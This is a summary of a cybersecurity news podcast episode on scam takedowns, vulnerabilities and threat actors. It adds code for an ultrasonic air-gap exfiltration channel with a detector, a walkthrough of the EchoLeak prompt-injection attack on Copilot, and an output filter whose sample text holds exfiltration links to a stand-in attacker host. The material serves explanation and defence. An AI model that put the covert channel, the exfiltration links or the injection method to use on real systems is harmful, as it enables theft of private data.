CyberWire Daily: Scam Operations Disrupted Across Asia Release Date: June 12, 2025 | Host: Dave Bittner (N2K Networks)
Overview
In today's episode of CyberWire Daily, host Dave Bittner delves into significant cybersecurity developments focusing on major disruptions of scam operations across Asia. The episode covers a spectrum of topics including international law enforcement collaborations, advanced cyber threats, critical vulnerabilities in popular platforms, and insightful analysis on U.S. antitrust policies affecting the tech industry. Notable insights are provided by N2K's lead analyst, Ethan Cook, offering listeners a comprehensive understanding of the current cybersecurity landscape.
1. Interpol's Operation Secure Dismantles Major Cybercrime Network in Asia
Timestamp: [00:02]
Interpol, in collaboration with law enforcement agencies in 25 countries across Asia and the South Pacific, has executed Operation Secure against the infrastructure behind infostealer malware. Key results of the operation include:
- Takedown of 20,000 malicious IP addresses and domains linked to infostealer malware.
- Seizure of 41 servers and more than 100 GB of data.
- Identification of 117 command-and-control (C2) servers used for phishing, fraud, and theft of data such as passwords and cryptocurrency wallet details.
Notable Quote:
"Interpol worked with cybersecurity firms like Group-IB and Kaspersky to share intel, highlighting the value of international collaboration in combating global cyber threats." – Dave Bittner [02:45]
Impact:
- 216,000 individuals were alerted to potential security risks.
- 32 arrests were made across countries including Vietnam, Sri Lanka, and Nauru.
2. Singapore Leads Operation Frontier Plus Against Scam Syndicates
Timestamp: [08:15]
Singapore spearheaded Operation Frontier Plus, a month-long multinational initiative aimed at dismantling scam syndicates responsible for approximately $225 million in fraud. Key actions and outcomes include:
- Coordination with law enforcement from Hong Kong, South Korea, Malaysia, the Maldives, Thailand, and Macau.
- Investigation of nearly 34,000 suspects linked to over 9,200 scams, ranging from fake investments to romance and job scams.
- 1,800 arrests made, 32,000 bank accounts frozen, and $20 million seized.
- Singapore alone arrested 106 suspects tied to $30 million in fraud, recovering $8 million.
Notable Quote:
"Officials stress the growing sophistication of these scams and the need for a global response." – Dave Bittner [09:30]
3. GitLab Addresses Critical Vulnerabilities in DevSecOps Platform
Timestamp: [12:50]
GitLab has released urgent security updates to patch multiple vulnerabilities within its DevSecOps platform. These flaws present significant risks, including:
- Account takeover vulnerabilities.
- The ability for attackers to inject malicious jobs into CI/CD pipelines.
Key Vulnerabilities Addressed:
- HTML injection
- Missing authorization
- Cross-site scripting (XSS)
- Denial of Service (DoS) flaws
Action Required:
- GitLab.com has already been patched.
- Self-managed instances do not update themselves; administrators are urged to upgrade immediately to close the window for exploitation.
4. Researchers Uncover Smart Attack: Data Exfiltration via Smartwatches
Timestamp: [17:05]
Israeli researchers have demonstrated a covert channel, dubbed Smart Attack, that exfiltrates data from air-gapped systems through smartwatches. The attack works as follows:
- Malware already running on the isolated computer encodes data as ultrasonic tones and plays them through the machine's built-in speakers.
- The tones, inaudible to people, are picked up by the microphone of a smartwatch worn nearby.
- The watch then forwards the recovered data over Wi-Fi, Bluetooth, or a cellular connection.
Implications:
- Demonstrates how insider threats can bypass physical isolation measures.
- Highlights the potential risks of wearable technology in secure environments.
Mitigation Strategies:
- Banning smartwatches in sensitive areas.
- Disabling or physically removing speakers on air-gapped systems so there is nothing to emit the signal.
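As an added illustration (this is example code, not the researchers' own implementation, and the channel parameters are assumptions rather than the values in their paper), the following Python models both ends of such an acoustic channel and the check a defender could run against it. The transmitter maps bits to two ultrasonic tones (binary FSK), the receiver picks the stronger tone per symbol slot with the Goertzel algorithm, and a simple monitor reports what share of a speaker's output energy lies above 17 kHz, which is how one would catch a "silent" machine that is in fact transmitting. Sample rate, tone frequencies, symbol rate, band edge and the payload are all constructed for the example, and the receiver assumes it is already aligned to symbol boundaries (a real channel needs a preamble).

```python
import math
import random

# Channel parameters. These are assumptions for the example, not the values used by the researchers.
SAMPLE_RATE = 48_000               # Hz; consumer sound cards commonly support this
F0, F1 = 18_500.0, 19_500.0        # tone frequencies for bit 0 / bit 1, above most adults' hearing
SYMBOL_SEC = 0.01                  # 10 ms per bit -> 100 bit/s
N = int(SAMPLE_RATE * SYMBOL_SEC)  # 480 samples per symbol: both tones fit a whole number of cycles
BAND_LO = 17_000.0                 # lower edge of the band the monitor treats as "ultrasonic"


def bytes_to_bits(data: bytes) -> list:
    return [(byte >> (7 - i)) & 1 for byte in data for i in range(8)]


def bits_to_bytes(bits: list) -> bytes:
    out = bytearray()
    for i in range(0, len(bits) - len(bits) % 8, 8):
        value = 0
        for bit in bits[i:i + 8]:
            value = (value << 1) | bit
        out.append(value)
    return bytes(out)


def modulate(data: bytes, amplitude: float = 0.5) -> list:
    """Transmitter side: binary FSK, N samples of a sine at F0 or F1 per bit, phase kept continuous."""
    samples, phase = [], 0.0
    for bit in bytes_to_bits(data):
        step = 2.0 * math.pi * (F1 if bit else F0) / SAMPLE_RATE
        for _ in range(N):
            samples.append(amplitude * math.sin(phase))
            phase += step
        phase %= 2.0 * math.pi
    return samples


def goertzel_power(samples: list, freq: float) -> float:
    """Power of the single DFT bin nearest `freq`, without computing a full FFT."""
    n = len(samples)
    k = int(0.5 + n * freq / SAMPLE_RATE)
    coeff = 2.0 * math.cos(2.0 * math.pi * k / n)
    s1 = s2 = 0.0
    for x in samples:
        s1, s2 = x + coeff * s1 - s2, s1
    return s1 * s1 + s2 * s2 - coeff * s1 * s2


def demodulate(samples: list) -> bytes:
    """Receiver side (what the watch would run): the stronger of the two tones in each slot is the bit.
    Assumes alignment to symbol boundaries; a real receiver would first lock onto a preamble."""
    bits = []
    for start in range(0, len(samples) - N + 1, N):
        slot = samples[start:start + N]
        bits.append(1 if goertzel_power(slot, F1) > goertzel_power(slot, F0) else 0)
    return bits_to_bytes(bits)


def add_noise(samples: list, amplitude: float = 0.05, seed: int = 1) -> list:
    """Constructed room noise: uniform jitter with a fixed seed so runs are repeatable."""
    rng = random.Random(seed)
    return [x + rng.uniform(-amplitude, amplitude) for x in samples]


def pure_tone(freq: float, seconds: float, amplitude: float = 0.5) -> list:
    """An ordinary audible tone, the benign comparison for the monitor."""
    return [amplitude * math.sin(2.0 * math.pi * freq * i / SAMPLE_RATE)
            for i in range(int(seconds * SAMPLE_RATE))]


def ultrasonic_fraction(samples: list, window: int = N) -> float:
    """Monitor side: average share of energy above BAND_LO per window, via Parseval's theorem.
    A value near 1.0 means almost everything the speaker emits is inaudible to people."""
    k_lo = int(window * BAND_LO / SAMPLE_RATE)
    ratios = []
    for start in range(0, len(samples) - window + 1, window):
        chunk = samples[start:start + window]
        total = sum(x * x for x in chunk)
        if total == 0.0:
            continue  # silence carries no information either way
        band = sum(goertzel_power(chunk, k * SAMPLE_RATE / window) for k in range(k_lo, window // 2))
        ratios.append(min(1.0, 2.0 * band / (window * total)))  # x2: every bin has a mirror above Nyquist
    return sum(ratios) / len(ratios) if ratios else 0.0


if __name__ == "__main__":
    payload = b"secret"  # constructed sample payload
    wave = add_noise(modulate(payload))
    print("decoded:", demodulate(wave))
    print("ultrasonic share, covert signal:", round(ultrasonic_fraction(wave), 3))
    print("ultrasonic share, 1 kHz tone:   ", round(ultrasonic_fraction(pure_tone(1000.0, 0.2)), 3))
```

The monitor is the piece a defender actually deploys: tapping the audio output (or a microphone in the room) and alerting when the ultrasonic share stays high for more than a few windows catches this channel regardless of the modulation the malware chooses, whereas the speaker ban in the mitigation list removes it outright.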
5. Microsoft Copilot's 'Echo Leak' Vulnerability Exploited for Data Exfiltration
Timestamp: [21:30]
Microsoft has disclosed a critical vulnerability in Microsoft 365 Copilot, named EchoLeak and described as the first known zero-click attack on an AI agent. The exploit chain:
- Exfiltrates sensitive data through what the researchers call an LLM scope violation: untrusted content pulled in as context ends up steering how the model handles privileged data.
- Starts with an email carrying a hidden prompt injection dressed up as ordinary business content.
- When the user later asks Copilot a related question, retrieval pulls that email into the model's context; the injected instructions make Copilot embed internal data in a link or image reference that the client fetches automatically, so the data reaches an attacker-controlled server without any click.
Key Details:
- Discovered and reported by Aim Security in January 2025.
- Patched by Microsoft in May 2025 through server-side updates.
- No evidence of exploitation in the wild; no customer action required.
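The last step of that chain is the one a deployer can break on their own side: whatever the model emits must pass through a renderer, and the renderer should never fetch a reference the model was talked into writing. Below is an added example (not Microsoft's or Aim Security's code, and not a description of the actual EchoLeak bypass) of an output filter that sits between the model and the renderer. It assumes Markdown output, a constructed allow list of hosts, and an arbitrary query-length threshold; images are removed outright when blocked because a renderer loads them without a click, while blocked links keep their visible text and lose the URL.

```python
import re
from urllib.parse import urlsplit

# Hosts an assistant may reference in links and images. Constructed allow list for this
# example; a real deployment would take it from policy rather than hard-code it.
ALLOWED_HOSTS = {"contoso.sharepoint.com", "teams.microsoft.com"}
# Query strings longer than this are treated as a possible smuggled payload (arbitrary threshold).
MAX_QUERY_CHARS = 96

# Markdown image (![alt](url)) or link ([text](url)), with an optional "title" after the URL.
MD_REF = re.compile(r'(!?)\[([^\]]*)\]\(\s*([^)\s]+)(?:\s+"[^"]*")?\s*\)')


def classify_reference(url: str):
    """Decide whether a URL emitted by the model may be rendered. Returns (verdict, reason)."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if parts.scheme not in ("http", "https"):
        return "block", f"scheme {parts.scheme!r} is not allowed"
    if host not in ALLOWED_HOSTS:
        return "block", f"host {host!r} is not on the allow list"
    if len(parts.query) > MAX_QUERY_CHARS:
        return "block", "query string long enough to carry exfiltrated data"
    return "allow", ""


def sanitize_output(text: str):
    """Rewrite model output before it reaches the renderer.

    Images are the dangerous case: the renderer fetches them with no user action, so a blocked
    image is dropped entirely. A blocked link keeps its label and loses the URL. Returns the
    rewritten text and a list of findings for logging.
    """
    findings = []

    def rewrite(match):
        is_image, label, url = match.group(1) == "!", match.group(2), match.group(3)
        verdict, reason = classify_reference(url)
        if verdict == "allow":
            return match.group(0)
        findings.append({"kind": "image" if is_image else "link", "url": url, "reason": reason})
        return "[image removed]" if is_image else label

    return MD_REF.sub(rewrite, text), findings


# Constructed model output: one legitimate SharePoint link, one image that would push data to an
# outside host with no click, one image on an allowed host whose query is suspiciously long, and
# one link to an outside host. The tokens are made up.
SAMPLE_OUTPUT = (
    "Summary of the finance thread:\n"
    "![status](https://attacker.example.net/px.gif?d=Y2FyZCA0MTExLTIyMjItMzMzMy00NDQ0LCBleHAgMDcvMjg=)\n"
    "Full plan: [Q2 plan](https://contoso.sharepoint.com/sites/finance/Q2.docx \"Q2 plan\")\n"
    "![chart](https://contoso.sharepoint.com/chart.png?tok=" + "A" * 120 + ")\n"
    "More: [details](https://attacker.example.net/r?x=dXNlcj1hbGljZQ==)\n"
)

if __name__ == "__main__":
    clean, found = sanitize_output(SAMPLE_OUTPUT)
    print(clean)
    for finding in found:
        print("blocked", finding["kind"], finding["url"], "-", finding["reason"])
```

The filter is deliberately strict about allowed hosts rather than trying to recognise "bad" content in the URL: an attacker controls the prompt, so any pattern-based denylist on the link text or query is something they can work around, whereas a host allow list enforced outside the model is not something the model can be talked out of.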
6. Paragon's Graphite Spyware Targets Journalists in Italy and Europe
Timestamp: [25:10]
Citizen Lab has confirmed the first known infections with Paragon's Graphite spyware, targeting Italian journalist Ciro Pellegrino and an unnamed European journalist. Key points include:
- Zero-click iMessage exploit used to compromise devices without user interaction.
- Associated with Italian intelligence agencies, although Italy denies involvement.
- Additional victims include journalists and migrant aid workers, suggesting a broader targeting scope.
Impact:
- Government Response: Despite the denials, the scandal has widened and drawn increased scrutiny.
- Withdrawal of Ties: Paragon, an Israeli vendor, ended its relationship with Italy after the government declined to investigate.
Notable Quote:
"Despite Italy's denials, the spyware scandal has widened with other victims, including journalists and migrant aid workers." – Dave Bittner [26:45]
7. France's CNIL Proposes Regulations on Email Tracking Pixels
Timestamp: [29:20]
France's data watchdog, CNIL, has launched a public consultation on a draft recommendation aimed at regulating the use of tracking pixels in emails. These invisible one-by-one-pixel images are loaded from the sender's server when a message is displayed, which lets the sender record whether, when, and from where it was opened, a practice that raises significant privacy concerns.
Key Aspects of the Proposal:
- Clarification of consent requirements for email tracking.
- Ensuring compliance with privacy standards amid rising complaints about email tracking.
- Applicable to all organizations and their service providers utilizing email tracking technologies.
Consultation Details:
- Duration: Open until July 24, 2025.
- Additional Focus: CNIL is seeking input on the economic impact of the proposed regulations.
8. FOG Ransomware Operators Utilize Unusual Toolkit to Evade Detection
Timestamp: [33:50]
Fog ransomware operators have been observed using an atypical toolkit that mixes open-source utilities with legitimate commercial software to slip past standard detection. Notable components include:
- Syteca (legitimate employee-monitoring software): used to capture credentials.
- GC2: a rarely seen backdoor that uses Google Sheets or SharePoint for command and control (C2).
- Stowaway: a proxy tool used to deliver malware stealthily.
- SMBExec and PsExec: used for lateral movement within the network.
- Adaptix C2: used for post-exploitation activity.
- 7-Zip, MegaSync, and FreeFileSync: used for data exfiltration.
Implications:
- The pairing of Syteca with GC2 signals evolving tradecraft that traditional ransomware detection is not tuned for.
Notable Quote:
"The attackers also used 7-Zip, MegaSync and FreeFileSync for data exfiltration." – Dave Bittner [34:30]
9. Skeleton Spider Shifts Tactics to Target Recruiters via LinkedIn
Timestamp: [38:10]
The cybercriminal group FIN6, also tracked as Skeleton Spider, is adopting new tactics to infiltrate organizations by posing as job seekers on LinkedIn. Key tactics include:
- Phishing Emails: Convincing messages with no clickable links, prompting recipients to type the URL in by hand so that link-scanning tools have nothing to inspect.
- Fake Resume Websites: Hosted on trusted platforms such as AWS and gated with CAPTCHAs and traffic filters so that automated security tools never reach the payload.
- Malware Delivery: The site redirects victims to the More_eggs backdoor, a malware-as-a-service tool used to steal credentials and stage ransomware attacks.
Evolution:
- Historically focused on stealing payment card data from POS systems, FIN6 is now expanding to broader enterprise targets through sophisticated social engineering.
Notable Quote:
"The use of professional messaging and cloud hosting allows them to evade detection, signaling a more sophisticated approach to targeting organizations through social engineering." – Dave Bittner [39:50]
10. Cyber Attack Causes Ongoing Outages for Erie Insurance
Timestamp: [42:20]
On June 7, 2025, Erie Insurance and Erie Indemnity Company experienced a significant cyber attack resulting in:
- Ongoing outages affecting customer access to portals.
- Inability to file claims or receive documents.
- Activation of the Incident Response Plan, with collaboration alongside law enforcement and cybersecurity experts.
Current Status:
- Nature and Impact: Remain unclear; no confirmation if ransomware or data theft is involved.
- Customer Assurance: Erie Insurance emphasized that they won't request payments via email or phone during the outage.
11. In-Depth Analysis: Trump's Aggressive Antitrust Policies
Timestamp: [15:54]
In a segment from the Caveat podcast, N2K's lead analyst, Ethan Cook, engages in a detailed discussion about the Trump administration's stance on antitrust policies, particularly in relation to Big Tech. Key points include:
- Aggressive Approach: The Trump administration is arguably the most proactive in two decades against Big Tech's monopolistic practices, pressing ahead with cases first brought under the Biden administration.
- Unexpected Firmness: Contrary to expectations that Trump would favor Silicon Valley given his 2024 supporter base, the administration has continued to vigorously pursue antitrust cases, including ongoing actions against Google.
- Lina Khan's Influence: While the FTC under Lina Khan, a noted antitrust hawk, led many of these initiatives, figures in Trump's administration such as Vice President JD Vance have expressed admiration for Khan's work, which may shape the policy direction.
Notable Quotes:
"I think this is a really interesting surprise that his administration has been so tough, particularly because a lot of the Trump presidency has been undoing the work of the previous administration." – Ethan Cook [16:45]
"There's that rift between him and social media companies, him and big tech companies...they have kept their foot on the gas pedal." – Ethan Cook [17:10]
Discussion Highlights:
- Coalition Dynamics: Despite strong initial alliances with Silicon Valley figures like Bezos, Musk, and Zuckerberg during Trump's inauguration, underlying tensions and conflicting interests have persisted.
- Policy Continuity and Change: The administration's relentless pursuit of antitrust actions suggests a complex interplay between political loyalty, economic strategies, and regulatory priorities.
Conclusion: Ethan Cook underscores the unexpected tenacity of Trump's administration in addressing antitrust issues, highlighting a shift from perceived alliances to a more regulatory stance against major technology firms.
Conclusion
Today's episode of CyberWire Daily underscores the dynamic and evolving nature of cyber threats and the global efforts to combat them. From international law enforcement collaborations disrupting vast cybercrime networks to sophisticated malware attacks exploiting everyday devices, the cybersecurity landscape remains highly volatile. Additionally, the in-depth analysis of U.S. antitrust policies provides valuable insights into how political dynamics can influence regulatory approaches towards big tech. As cyber threats continue to advance in complexity, the importance of international cooperation, proactive security measures, and informed policy-making becomes ever more critical.
Notable Sponsor Mentions:
- Indeed: Highlighted their effectiveness in hiring, with a special $75 sponsored job credit for listeners.
- Vanta: Promoted their trust management platform for governance, risk, and compliance.
- SpyCloud: Offered solutions for identity threat protection.
Beyond the mentions listed above, sponsor messages and advertisements have been excluded from this summary to focus on the episode's substantive content.
